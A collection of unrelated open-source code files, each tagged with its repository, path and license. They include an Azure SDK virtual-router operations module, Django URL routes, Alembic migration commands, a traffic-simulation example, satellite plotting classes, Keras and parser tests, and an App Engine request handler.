) -> AsyncLROPoller["_models.VirtualRouter"]:
"""Creates or updates the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param parameters: Parameters supplied to the create or update Virtual Router.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.VirtualRouter
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VirtualRouter or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_12_01.models.VirtualRouter]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.VirtualRouterListResult"]:
"""Lists all Virtual Routers in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_12_01.models.VirtualRouterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters'} # type: ignore
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.VirtualRouterListResult"]:
"""Gets all the Virtual Routers in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_12_01.models.VirtualRouterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualRouters'} # type: ignore
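# Illustrative usage (added note; not part of the generated file). Assumes an
# authenticated NetworkManagementClient named `client` built elsewhere, whose
# `virtual_routers` attribute is an instance of this operations class:
#
#     poller = await client.virtual_routers.begin_create_or_update(
#         'my-resource-group', 'my-virtual-router', parameters)
#     router = await poller.result()
#
#     async for vr in client.virtual_routers.list():
#         print(vr.name)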
| Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_12_01/aio/operations/_virtual_routers_operations.py | Python | mit | 24,260 |
from .parameter import parameter
from .attribute import attribute
from .wasp import wasp
| agoose77/hivesystem | hiveguilib/spyderbees/__init__.py | Python | bsd-2-clause | 89 |
from django.conf.urls import url
from django.contrib.auth.views import password_change
from . import views
urlpatterns = [
url(r'^$', views.UserList.as_view(), name='user_list'),
url(r'^edit/$', views.UserUpdate.as_view(), name='user_profile_edit'),
url(r'^change-password/$', password_change, name='user_change_password', kwargs={
'template_name': 'users/password_change_form.html',
'post_change_redirect': '/users/edit/',
}),
url(r'^membership/$', views.MembershipCreate.as_view(), name='user_membership_create'),
url(r'^membership/edit/$', views.MembershipUpdate.as_view(), name='user_membership_edit'),
url(r'^membership/thanks/$', views.MembershipThanks.as_view(), name='user_membership_thanks'),
url(r'^membership/affirm/$', views.MembershipVoteAffirm.as_view(), name='membership_affirm_vote'),
url(r'^membership/affirm/done/$', views.MembershipVoteAffirmDone.as_view(), name='membership_affirm_vote_done'),
url(r'^(?P<slug>[-_\w\@\.+]+)/$', views.UserDetail.as_view(), name='user_detail'),
]
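# Illustrative resolution (names hypothetical): a request for /users/guido/
# falls through to the final pattern and renders UserDetail with slug='guido',
# while /users/edit/ is caught earlier by the more specific rules above.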
| lebronhkh/pythondotorg | users/urls.py | Python | apache-2.0 | 1,059 |
'''
Integrate tRNA unique mass and find corresponding peaks
'''
from RNAMassGen import GetUniqueMass, AllMassPossibility  # AllMassPossibility assumed to live in RNAMassGen; it was used below without an import
from GetPeaks import GetPeaksWithRTEstimate
def main():
ms_file = "./E165ug.mzML"
mass_dict = GetUniqueMass("./Data/tRNAseq.txt")
print mass_dict
mass_list = []
mass_all_possible = dict()
for rna in mass_dict:
mass_all_possible[rna] = dict()
for seg_mass in mass_dict[rna]:
all_mass = AllMassPossibility(seg_mass[1])
mass_all_possible[rna][seg_mass[0]] = all_mass
mass_list += all_mass
print mass_all_possible
max_int_dict = GetPeaksWithRTEstimate(ms_file, mass_list)
print max_int_dict
for header in mass_all_possible:
print header
for seg in mass_all_possible[header]:
print seg
for mass in mass_all_possible[header][seg]:
print mass
print "max intensity:", max_int_dict[mass]
if __name__ == "__main__":
main()
| ajing/MassSpec | Integrate.py | Python | mit | 992 |
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
    (r'^accounts/', include('allauth.urls')),
(r'^', include('surveys.urls')),
)
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
| mainecivichackday/RISE_Survey | rise/urls.py | Python | bsd-3-clause | 487 |
# -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2015 Michal Čihař <[email protected]>
#
# This file is part of Weblate <http://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from weblate.trans.management.commands import WeblateCommand
class Command(WeblateCommand):
help = 'unlocks subproject for editing'
def handle(self, *args, **options):
for subproject in self.get_subprojects(*args, **options):
if subproject.locked:
subproject.locked = False
subproject.save()
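# Illustrative invocation (argument handling is inherited from the
# WeblateCommand base class; the exact selector syntax depends on the
# Weblate version):
#
#     ./manage.py unlock_translation <project>/<subproject>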
| mablae/weblate | weblate/trans/management/commands/unlock_translation.py | Python | gpl-3.0 | 1,136 |
"""Used as an example of sugiyama experiment.
This example consists of 22 IDM cars on a ring creating shockwaves.
"""
from flow.controllers import IDMController, ContinuousRouter
from flow.core.experiment import Experiment
from flow.core.params import SumoParams, EnvParams, \
InitialConfig, NetParams, SumoCarFollowingParams
from flow.core.params import VehicleParams
from flow.envs.loop.loop_accel import AccelEnv, ADDITIONAL_ENV_PARAMS
from flow.scenarios.loop import LoopScenario, ADDITIONAL_NET_PARAMS
def sugiyama_example(render=None):
"""
Perform a simulation of vehicles on a ring road.
Parameters
----------
render : bool, optional
specifies whether to use the gui during execution
Returns
-------
exp: flow.core.experiment.Experiment
A non-rl experiment demonstrating the performance of human-driven
vehicles on a ring road.
"""
sim_params = SumoParams(sim_step=0.1, render=True)
if render is not None:
sim_params.render = render
vehicles = VehicleParams()
vehicles.add(
veh_id="idm",
acceleration_controller=(IDMController, {}),
car_following_params=SumoCarFollowingParams(
min_gap=0
),
routing_controller=(ContinuousRouter, {}),
num_vehicles=22)
env_params = EnvParams(additional_params=ADDITIONAL_ENV_PARAMS)
additional_net_params = ADDITIONAL_NET_PARAMS.copy()
net_params = NetParams(additional_params=additional_net_params)
initial_config = InitialConfig(bunching=20)
scenario = LoopScenario(
name="sugiyama",
vehicles=vehicles,
net_params=net_params,
initial_config=initial_config)
env = AccelEnv(env_params, sim_params, scenario)
return Experiment(env)
if __name__ == "__main__":
# import the experiment variable
exp = sugiyama_example()
# run for a set number of rollouts / time steps
exp.run(1, 1500)
| cathywu/flow | examples/sumo/sugiyama.py | Python | mit | 1,961 |
cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_car = passengers / cars_driven
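# Note: in Python 3 the / operator always returns a float, so the
# average above is 3.0 rather than the integer 3.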
print("There are", cars, "cars available.")
print("There are only", drivers, "drivers available.")
print("There will be", cars_not_driven, "empty cars today.")
print("We can transport", carpool_capacity, "people today.")
print("We have", passengers, "to carpool today.")
print("We need to put about", average_passengers_per_car, "in each car.")
| zedshaw/learn-python3-thw-code | ex4.py | Python | mit | 566 |
import nash.parser as parser
nash_parser = parser.Parser()
def test_parsing_integers():
ast = nash_parser.parse("3")
assert ast == ('BLOCK', [('INTEGER', 3)])
def test_parsing_floats():
ast = nash_parser.parse("3.3")
assert ast == ('BLOCK', [('FLOAT', 3.3)])
def test_parsing_addition():
ast = nash_parser.parse("3 + 4")
assert ast == ('BLOCK', [('ADD', ('INTEGER', 3), ('INTEGER', 4))])
def test_parsing_subtraction():
ast = nash_parser.parse("3 - 4")
assert ast == ('BLOCK', [('SUBTRACT', ('INTEGER', 3), ('INTEGER', 4))])
def test_parsing_multiplication():
ast = nash_parser.parse("3 * 4")
assert ast == ('BLOCK', [('MULTIPLY', ('INTEGER', 3), ('INTEGER', 4))])
def test_parsing_division():
ast = nash_parser.parse("3 / 4")
assert ast == ('BLOCK', [('DIVIDE', ('INTEGER', 3), ('INTEGER', 4))])
def test_parsing_parenthesis():
ast = nash_parser.parse("(1 + 2) + 3")
assert ast == ('BLOCK', [('ADD', ('ADD', ('INTEGER', 1), ('INTEGER', 2)), ('INTEGER', 3))])
ast = nash_parser.parse("1 + (2 + 3)")
assert ast == ('BLOCK', [('ADD', ('INTEGER', 1), ('ADD', ('INTEGER', 2), ('INTEGER', 3)))])
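# Illustrative: these tests can be run from the repository root with pytest,
# assuming pytest is installed and the nash package is importable:
#
#     pytest tests/test_parsing_math_expressions.py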
| mightymoose/nash | tests/test_parsing_math_expressions.py | Python | bsd-3-clause | 1,163 |
import os
from .script import ScriptDirectory
from .environment import EnvironmentContext
from . import util, autogenerate as autogen
def list_templates(config):
"""List available templates"""
config.print_stdout("Available templates:\n")
for tempname in os.listdir(config.get_template_directory()):
with open(os.path.join(
config.get_template_directory(),
tempname,
'README')) as readme:
synopsis = next(readme)
config.print_stdout("%s - %s", tempname, synopsis)
config.print_stdout("\nTemplates are used via the 'init' command, e.g.:")
config.print_stdout("\n alembic init --template pylons ./scripts")
def init(config, directory, template='generic'):
"""Initialize a new scripts directory."""
if os.access(directory, os.F_OK):
raise util.CommandError("Directory %s already exists" % directory)
template_dir = os.path.join(config.get_template_directory(),
template)
if not os.access(template_dir, os.F_OK):
raise util.CommandError("No such template %r" % template)
util.status("Creating directory %s" % os.path.abspath(directory),
os.makedirs, directory)
versions = os.path.join(directory, 'versions')
util.status("Creating directory %s" % os.path.abspath(versions),
os.makedirs, versions)
script = ScriptDirectory(directory)
for file_ in os.listdir(template_dir):
file_path = os.path.join(template_dir, file_)
if file_ == 'alembic.ini.mako':
config_file = os.path.abspath(config.config_file_name)
if os.access(config_file, os.F_OK):
util.msg("File %s already exists, skipping" % config_file)
else:
script._generate_template(
file_path,
config_file,
script_location=directory
)
elif os.path.isfile(file_path):
output_file = os.path.join(directory, file_)
script._copy_file(
file_path,
output_file
)
util.msg("Please edit configuration/connection/logging "\
"settings in %r before proceeding." % config_file)
def revision(config, message=None, autogenerate=False, sql=False):
"""Create a new revision file."""
script = ScriptDirectory.from_config(config)
template_args = {
'config': config # Let templates use config for
# e.g. multiple databases
}
imports = set()
environment = util.asbool(
config.get_main_option("revision_environment")
)
if autogenerate:
environment = True
def retrieve_migrations(rev, context):
if script.get_revision(rev) is not script.get_revision("head"):
raise util.CommandError("Target database is not up to date.")
autogen._produce_migration_diffs(context, template_args, imports)
return []
elif environment:
def retrieve_migrations(rev, context):
return []
if environment:
with EnvironmentContext(
config,
script,
fn=retrieve_migrations,
as_sql=sql,
template_args=template_args,
):
script.run_env()
script.generate_revision(util.rev_id(), message, **template_args)
def upgrade(config, revision, sql=False, tag=None):
"""Upgrade to a later version."""
script = ScriptDirectory.from_config(config)
starting_rev = None
if ":" in revision:
if not sql:
raise util.CommandError("Range revision not allowed")
starting_rev, revision = revision.split(':', 2)
def upgrade(rev, context):
return script._upgrade_revs(revision, rev)
with EnvironmentContext(
config,
script,
fn=upgrade,
as_sql=sql,
starting_rev=starting_rev,
destination_rev=revision,
tag=tag
):
script.run_env()
def downgrade(config, revision, sql=False, tag=None):
"""Revert to a previous version."""
script = ScriptDirectory.from_config(config)
starting_rev = None
if ":" in revision:
if not sql:
raise util.CommandError("Range revision not allowed")
starting_rev, revision = revision.split(':', 2)
elif sql:
raise util.CommandError("downgrade with --sql requires <fromrev>:<torev>")
def downgrade(rev, context):
return script._downgrade_revs(revision, rev)
with EnvironmentContext(
config,
script,
fn=downgrade,
as_sql=sql,
starting_rev=starting_rev,
destination_rev=revision,
tag=tag
):
script.run_env()
def history(config, rev_range=None):
"""List changeset scripts in chronological order."""
script = ScriptDirectory.from_config(config)
if rev_range is not None:
if ":" not in rev_range:
raise util.CommandError(
"History range requires [start]:[end], "
"[start]:, or :[end]")
base, head = rev_range.strip().split(":")
else:
base = head = None
def _display_history(config, script, base, head):
for sc in script.walk_revisions(
base=base or "base",
head=head or "head"):
if sc.is_head:
config.print_stdout("")
config.print_stdout(sc.log_entry)
def _display_history_w_current(config, script, base=None, head=None):
def _display_current_history(rev, context):
if head is None:
_display_history(config, script, base, rev)
elif base is None:
_display_history(config, script, rev, head)
return []
with EnvironmentContext(
config,
script,
fn=_display_current_history
):
script.run_env()
if base == "current":
_display_history_w_current(config, script, head=head)
elif head == "current":
_display_history_w_current(config, script, base=base)
else:
_display_history(config, script, base, head)
def branches(config):
"""Show current un-spliced branch points"""
script = ScriptDirectory.from_config(config)
for sc in script.walk_revisions():
if sc.is_branch_point:
config.print_stdout(sc)
for rev in sc.nextrev:
config.print_stdout("%s -> %s",
" " * len(str(sc.down_revision)),
script.get_revision(rev)
)
def current(config, head_only=False):
"""Display the current revision for each database."""
script = ScriptDirectory.from_config(config)
def display_version(rev, context):
rev = script.get_revision(rev)
if head_only:
config.print_stdout("%s%s" % (
rev.revision if rev else None,
" (head)" if rev and rev.is_head else ""))
else:
config.print_stdout("Current revision for %s: %s",
util.obfuscate_url_pw(
context.connection.engine.url),
rev)
return []
with EnvironmentContext(
config,
script,
fn=display_version
):
script.run_env()
def stamp(config, revision, sql=False, tag=None):
"""'stamp' the revision table with the given revision; don't
run any migrations."""
script = ScriptDirectory.from_config(config)
def do_stamp(rev, context):
if sql:
current = False
else:
current = context._current_rev()
dest = script.get_revision(revision)
if dest is not None:
dest = dest.revision
context._update_current_rev(current, dest)
return []
with EnvironmentContext(
config,
script,
fn=do_stamp,
as_sql=sql,
destination_rev=revision,
tag=tag
):
script.run_env()
def splice(config, parent, child):
"""'splice' two branches, creating a new revision file.
this command isn't implemented right now.
"""
raise NotImplementedError()
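# Illustrative programmatic usage (the usual entry point is the `alembic` CLI;
# Config lives in alembic.config):
#
#     from alembic.config import Config
#     cfg = Config('alembic.ini')
#     upgrade(cfg, 'head')   # migrate to the latest revision
#     current(cfg)           # print the revision each database is at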
| adamwwt/chvac | venv/lib/python2.7/site-packages/alembic/command.py | Python | mit | 8,392 |
# -*- coding: utf-8 -*-
import xarray as xr
# import pathlib as pl
import numpy as np
# import cartopy.crs as ccrs
# import metpy
# from scipy import interpolate
# from datetime import datetime, timedelta
from mpl_toolkits.basemap import Basemap
from pyproj import Proj
import matplotlib.pyplot as plt
import plt_tools
from matplotlib import colors
class GeosSatteliteProducts(object):
def __init__(self,file):
if type(file) == xr.core.dataset.Dataset:
ds = file
else:
ds = xr.open_dataset(file)
self.ds = ds
# self._varname4test = 'CMI_C02'
self._lonlat = None
@property
def lonlat(self):
if isinstance(self._lonlat, type(None)):
# Satellite height
sat_h = self.ds['goes_imager_projection'].perspective_point_height
# Satellite longitude
sat_lon = self.ds['goes_imager_projection'].longitude_of_projection_origin
# Satellite sweep
sat_sweep = self.ds['goes_imager_projection'].sweep_angle_axis
# The projection x and y coordinates equals the scanning angle (in radians) multiplied by the satellite height
# See details here: https://proj4.org/operations/projections/geos.html?highlight=geostationary
x = self.ds['x'][:] * sat_h
y = self.ds['y'][:] * sat_h
# Create a pyproj geostationary map object to be able to convert to what ever projecton is required
p = Proj(proj='geos', h=sat_h, lon_0=sat_lon, sweep=sat_sweep)
# Perform cartographic transformation. That is, convert image projection coordinates (x and y)
# to latitude and longitude values.
XX, YY = np.meshgrid(x, y)
lons, lats = p(XX, YY, inverse=True)
# Assign the pixels showing space as a single point in the Gulf of Alaska
# where = np.isnan(self.ds[self._varname4test].values)
where = np.isinf(lons)
lats[where] = 57
lons[where] = -152
            self._lonlat = (lons, lats)
return self._lonlat
class OR_ABI_L2_AODC_M6(GeosSatteliteProducts):
def plot(self, bmap = None, colorbar = True, max_aod = 1, norm = 'linear'):
cb = None
lons, lats = self.lonlat
if isinstance(bmap, type(None)):
bmap = Basemap(resolution='c', projection='aea', area_thresh=5000,
width=5e6, height=3e6,
# lat_1=38.5, lat_2=38.5,
lat_0=38.5, lon_0=-97.5)
bmap.drawcoastlines(linewidth = 0.7)
bmap.drawcountries(linewidth = 0.7)
bmap.drawstates(linewidth = 0.3)
pc = bmap.pcolormesh(lons, lats, self.ds.AOD.values, linewidth=0, latlon=True, zorder = 10)
pc.set_clim(vmax = max_aod)
pc.set_cmap(plt.cm.inferno)
pc.set_alpha(0.3)
if norm == 'log':
pc.set_norm(colors.LogNorm(0.01,1))
if colorbar:
# f = plt.gcf()
# f.colorbar(pc)
a= plt.gca()
cb, a = plt_tools.colorbar.colorbar_axis_split_off(pc,a)
cb.set_label('Aerosol optical depth')
cb.set_alpha(1)
cb.draw_all()
return bmap, pc, cb
class OR_ABI_L2_MCMIPC(GeosSatteliteProducts):
def __init__(self, *args):
super().__init__(*args)
# self._varname4test = 'CMI_C02'
def plot_true_color(self,
gamma = 1.8,#2.2,
contrast = 130, #105
projection = None,
bmap = None
):
channels_rgb = dict(red = self.ds['CMI_C02'].data.copy(),
green = self.ds['CMI_C03'].data.copy(),
blue = self.ds['CMI_C01'].data.copy())
channels_rgb['green_true'] = 0.45 * channels_rgb['red'] + 0.1 * channels_rgb['green'] + 0.45 * channels_rgb['blue']
for chan in channels_rgb:
col = channels_rgb[chan]
# Apply range limits for each channel. RGB values must be between 0 and 1
new_col = col / col[~np.isnan(col)].max()
# apply gamma
if not isinstance(gamma, type(None)):
new_col = new_col**(1/gamma)
# contrast
            # http://www.dfstudios.co.uk/articles/programming/image-programming-algorithms/image-processing-algorithms-part-5-contrast-adjustment/
if not isinstance(contrast, type(None)):
cfact = (259*(contrast + 255))/(255.*259-contrast)
new_col = cfact*(new_col-.5)+.5
channels_rgb[chan] = new_col
rgb_image = np.dstack([channels_rgb['red'],
channels_rgb['green_true'],
channels_rgb['blue']])
rgb_image = np.clip(rgb_image,0,1)
a = plt.subplot()
if isinstance(projection, type(None)) and isinstance(bmap, type(None)):
a.imshow(rgb_image)
# a.set_title('GOES-16 RGB True Color', fontweight='semibold', loc='left', fontsize=12);
# a.set_title('%s' % scan_start.strftime('%d %B %Y %H:%M UTC '), loc='right');
a.axis('off')
else:
lons,lats = self.lonlat
# Make a new map object Lambert Conformal projection
if not isinstance(bmap,Basemap):
bmap = Basemap(resolution='i', projection='aea', area_thresh=5000,
width=3000*3000, height=2500*3000,
# lat_1=38.5, lat_2=38.5,
lat_0=38.5, lon_0=-97.5)
bmap.drawcoastlines()
bmap.drawcountries()
bmap.drawstates()
# Create a color tuple for pcolormesh
# Don't use the last column of the RGB array or else the image will be scrambled!
# This is the strange nature of pcolormesh.
rgb_image = rgb_image[:,:-1,:]
# Flatten the array, becuase that's what pcolormesh wants.
colortuple = rgb_image.reshape((rgb_image.shape[0] * rgb_image.shape[1]), 3)
# Adding an alpha channel will plot faster, according to Stack Overflow. Not sure why.
colortuple = np.insert(colortuple, 3, 1.0, axis=1)
# We need an array the shape of the data, so use R. The color of each pixel will be set by color=colorTuple.
pc = bmap.pcolormesh(lons, lats, channels_rgb['red'], color=colortuple, linewidth=0, latlon=True, zorder = 0)
pc.set_array(None) # Without this line the RGB colorTuple is ignored and only R is plotted.
# plt.title('GOES-16 True Color', loc='left', fontweight='semibold', fontsize=15)
# plt.title('%s' % scan_start.strftime('%d %B %Y %H:%M UTC'), loc='right');
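# Illustrative usage (added note; the file name below is hypothetical and must
# point at a GOES-16 ABI L2 MCMIP NetCDF file):
#
#     sat = OR_ABI_L2_MCMIPC('OR_ABI-L2-MCMIPC-M6_G16_sample.nc')
#     sat.plot_true_color(gamma=1.8, contrast=130)
#     plt.show()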
| hagne/atm-py | atmPy/data_archives/goes_satellites/satlab.py | Python | mit | 7,395 |
# pylint: disable=no-self-use,invalid-name
import numpy
from keras.layers import Input, Embedding
from keras.models import Model
from deep_qa.layers.encoders import BOWEncoder
class TestBOWEncoder:
def test_on_unmasked_input(self):
sentence_length = 5
embedding_dim = 10
vocabulary_size = 15
input_layer = Input(shape=(sentence_length,), dtype='int32')
# Embedding does not mask zeros
embedding = Embedding(input_dim=vocabulary_size, output_dim=embedding_dim)
encoder = BOWEncoder()
embedded_input = embedding(input_layer)
encoded_input = encoder(embedded_input)
model = Model(inputs=input_layer, outputs=encoded_input)
model.compile(loss="mse", optimizer="sgd") # Will not train this model
test_input = numpy.asarray([[0, 3, 1, 7, 10]], dtype='int32')
embedding_weights = embedding.get_weights()[0] # get_weights returns a list with one element.
expected_output = numpy.mean(embedding_weights[test_input], axis=1)
actual_output = model.predict(test_input)
# Exact comparison of the two arrays may break because theano's floating point operations
# usually have an epsilon. The following comparison is done till the sixth decimal, hence good enough.
numpy.testing.assert_array_almost_equal(expected_output, actual_output)
def test_on_masked_input(self):
sentence_length = 5
embedding_dim = 10
vocabulary_size = 15
input_layer = Input(shape=(sentence_length,), dtype='int32')
# Embedding masks zeros
embedding = Embedding(input_dim=vocabulary_size, output_dim=embedding_dim, mask_zero=True)
encoder = BOWEncoder()
embedded_input = embedding(input_layer)
encoded_input = encoder(embedded_input)
model = Model(inputs=input_layer, outputs=encoded_input)
model.compile(loss="mse", optimizer="sgd") # Will not train this model
test_input = numpy.asarray([[0, 3, 1, 7, 10]], dtype='int32')
embedding_weights = embedding.get_weights()[0] # get_weights returns a list with one element.
# Omitting the first element (0), because that is supposed to be masked in the model.
expected_output = numpy.mean(embedding_weights[test_input[:, 1:]], axis=1)
actual_output = model.predict(test_input)
# Following comparison is till the sixth decimal.
numpy.testing.assert_array_almost_equal(expected_output, actual_output)
def test_on_all_zeros(self):
sentence_length = 5
embedding_dim = 10
vocabulary_size = 15
input_layer = Input(shape=(sentence_length,), dtype='int32')
# Embedding masks zeros
embedding = Embedding(input_dim=vocabulary_size, output_dim=embedding_dim, mask_zero=True)
encoder = BOWEncoder()
embedded_input = embedding(input_layer)
encoded_input = encoder(embedded_input)
model = Model(inputs=input_layer, outputs=encoded_input)
model.compile(loss="mse", optimizer="sgd") # Will not train this model
test_input = numpy.asarray([[0, 0, 0, 0, 0]], dtype='int32')
# Omitting the first element (0), because that is supposed to be masked in the model.
expected_output = numpy.zeros((1, embedding_dim))
actual_output = model.predict(test_input)
# Following comparison is till the sixth decimal.
numpy.testing.assert_array_almost_equal(expected_output, actual_output)
| RTHMaK/RPGOne | deep_qa-master/tests/layers/encoders/bow_encoder_test.py | Python | apache-2.0 | 3,504 |
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Needed to avoid ambiguity in imports
from __future__ import absolute_import
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.api.labs import taskqueue
import os.path
import logging
import yaml
import web.helper
import models.tokens
import models.board
PRIORITY_PROFILES = yaml.safe_load(open('polling.yaml').read())  # safe_load: plain config data needs no arbitrary object construction
class PlayHandler(webapp.RequestHandler):
def get(self):
cookies = web.helper.parse_cookies(self)
if cookies:
db_access_token = models.tokens.AccessToken.from_key(
cookies.get('access_token')
)
if db_access_token:
player = db_access_token.player
logging.info('\'%s\' is playing the game!' % player.name)
board = player.board
template_values = {
'player': player,
'board': board
}
path = os.path.join(
os.path.dirname(__file__), '..', 'templates', 'board.html'
)
if player.profile_name in PRIORITY_PROFILES:
logging.info('Auto-polled user is playing. Enqueuing...')
try:
result_task = taskqueue.Task(url='/worker/poll/')
result_task.add()
except Exception, e:
# Eat all errors here, because we really just don't care what
# happened. We're just happy if we can poll faster than once
# a minute.
logging.error(str(e))
result_task = None
self.response.out.write(template.render(path, template_values))
else:
web.helper.clear_oauth_token_cookies(self)
self.redirect('/oauth/init/')
else:
web.helper.clear_oauth_token_cookies(self)
self.redirect('/oauth/init/')
